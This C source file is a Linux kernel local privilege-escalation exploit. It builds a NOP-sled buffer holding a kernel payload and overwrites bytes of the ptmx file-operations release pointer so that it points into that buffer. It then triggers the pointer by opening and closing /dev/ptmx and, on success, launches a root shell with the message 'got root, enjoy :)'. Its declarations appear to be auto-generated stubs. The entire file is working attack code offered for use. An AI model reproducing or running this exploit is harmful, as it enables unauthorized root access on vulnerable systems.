
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int EXIT_FAILURE ;
 long FOPS_RELEASE_OFFSET ;
 int PAYLOADSIZE ;
 long PTMX_FOPS ;
 int TTY_RELEASE ;
 int close (int) ;
 int execl (char*,char*,int *) ;
 int exit (int ) ;
 scalar_t__ getuid () ;
 int kernel_payload ;
 int memcpy (void*,int *,int) ;
 int memset (void*,int,int) ;
 scalar_t__ mmap (void*,int,int,int,int ,int ) ;
 int open (char*,char) ;
 int printf (char*) ;
 int zero_out (long) ;

int main(int argc, char** argv)
{
    long code, target;
    int pwn;


    printf("preparing payload buffer...\n");
    code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE, 7, 0x32, 0, 0);
    memset((void*)code, 0x90, PAYLOADSIZE);
    code += PAYLOADSIZE - 1024;
    memcpy((void*)code, &kernel_payload, 1024);






    printf("changing kernel pointer to point into controlled buffer...\n");
    target = PTMX_FOPS + FOPS_RELEASE_OFFSET;
    zero_out(target + 7);
    zero_out(target + 6);
    zero_out(target + 5);


    printf("releasing file descriptor to call manipulated pointer in kernel mode...\n");
    pwn = open("/dev/ptmx", 'r');
    close(pwn);

    if (getuid() != 0) {
        printf("failed to get root :(\n");
        exit(EXIT_FAILURE);
    }

    printf("got root, enjoy :)\n");
    return execl("/bin/bash", "-sh", ((void*)0));
}
